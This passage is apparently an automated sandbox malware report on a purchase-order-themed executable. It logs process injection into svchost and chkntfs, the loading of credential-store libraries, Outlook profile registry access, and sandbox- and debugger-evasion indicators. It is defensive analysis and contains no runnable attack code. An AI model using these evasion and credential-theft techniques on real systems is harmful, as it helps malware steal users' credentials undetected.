            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO_987654345678.exeStatic file information: File size 1250816 > 1048576
            Source: PO_987654345678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PO_987654345678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PO_987654345678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PO_987654345678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PO_987654345678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PO_987654345678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PO_987654345678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000001.00000002.1850544431.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818824564.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000003.1790761770.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4117923087.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ftfqgrfncDSuar.exe, 00000002.00000002.4118133929.0000000000FCE000.00000002.00000001.01000000.00000004.sdmp, ftfqgrfncDSuar.exe, 00000007.00000000.1919962522.0000000000FCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_987654345678.exe, 00000000.00000003.1656395524.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, PO_987654345678.exe, 00000000.00000003.1656295045.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1754906173.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1756794184.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1856952103.0000000004997000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1854994235.00000000047E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_987654345678.exe, 00000000.00000003.1656395524.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, PO_987654345678.exe, 00000000.00000003.1656295045.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1754906173.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1756794184.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000003.00000002.4118749012.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1856952103.0000000004997000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1854994235.00000000047E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000001.00000002.1850544431.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818824564.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000003.1790761770.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4117923087.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000003.00000002.4119101815.000000000516C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000331C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019BFC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000003.00000002.4119101815.000000000516C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000331C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019BFC000.00000004.80000000.00040000.00000000.sdmp
            Source: PO_987654345678.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PO_987654345678.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PO_987654345678.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PO_987654345678.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PO_987654345678.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F042DE
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F0832D push edi; retn 0000h0_2_00F0832F
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F20A76 push ecx; ret 0_2_00F20A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041583A push 0000006Eh; ret 1_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004158B7 push 0000006Eh; ret 1_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403400 push eax; ret 1_2_00403402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00405C1E push ebx; retf 1_2_00405C1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0225F pushad ; ret 1_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F027FA pushad ; ret 1_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0283D push eax; iretd 1_2_02F02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx1_2_02F309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F01368 push eax; iretd 1_2_02F01369
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B427FA pushad ; ret 3_2_04B427F9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B4225F pushad ; ret 3_2_04B427F9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B4283D push eax; iretd 3_2_04B42858
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B709AD push ecx; mov dword ptr [esp], ecx3_2_04B709B6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B418F3 push edx; ret 3_2_04B41906
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009924B4 push 0000006Eh; ret 3_2_009924D5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_00992437 push 0000006Eh; ret 3_2_009924D5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098281B push ebx; retf 3_2_0098281C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099F180 push 00000052h; retn F78Dh3_2_0099F226
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099510F pushfd ; retf 3_2_00995128
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_00995229 push ecx; ret 3_2_0099522E
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099B963 push esi; iretd 3_2_0099B964
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E44A9 push edx; retf 3_2_049E44AA
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E34CE push ds; ret 3_2_049E34D4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049F142E push ebx; ret 3_2_049F142F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E55AE push ecx; iretd 3_2_049E55B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E469E push ss; iretd 3_2_049E46A4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E4694 push es; ret 3_2_049E469A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049ED619 push ebx; retf 3_2_049ED662
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049F1732 push esi; ret 3_2_049F1733
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F1F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F1F98E
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F91C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F91C41
            Source: C:\Users\user\Desktop\PO_987654345678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\PO_987654345678.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97159
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\PO_987654345678.exeAPI/Special instruction interceptor: Address: EB3254
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 9829Jump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeAPI coverage: 4.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7892Thread sleep count: 144 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7892Thread sleep time: -288000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7892Thread sleep count: 9829 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 7892Thread sleep time: -19658000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976Thread sleep time: -52500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe TID: 7976Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F6DBBE
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F768EE FindFirstFileW,FindClose,0_2_00F768EE
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00F7698F
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F6D076
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F6D3A9
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F79642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F79642
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F7979D
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F79B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00F79B2B
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F75C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00F75C97
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099C750 FindFirstFileW,FindNextFileW,FindClose,3_2_0099C750
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099C886 FindFirstFileW,FindNextFileW,FindClose,3_2_0099C886
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F042DE
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: ftfqgrfncDSuar.exe, 00000007.00000002.4118270822.0000000001430000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2145869628.000001ACD9B4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417A63 LdrLoadDll,1_2_00417A63
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7EAA2 BlockInput,0_2_00F7EAA2
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F32622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F32622
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F042DE
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F24CE8 mov eax, dword ptr fs:[00000030h]0_2_00F24CE8
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00EB34C0 mov eax, dword ptr fs:[00000030h]0_2_00EB34C0
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00EB3520 mov eax, dword ptr fs:[00000030h]0_2_00EB3520
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00EB1E70 mov eax, dword ptr fs:[00000030h]0_2_00EB1E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov ecx, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300634F mov eax, dword ptr fs:[00000030h]1_2_0300634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]1_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]1_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]1_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]1_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]1_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
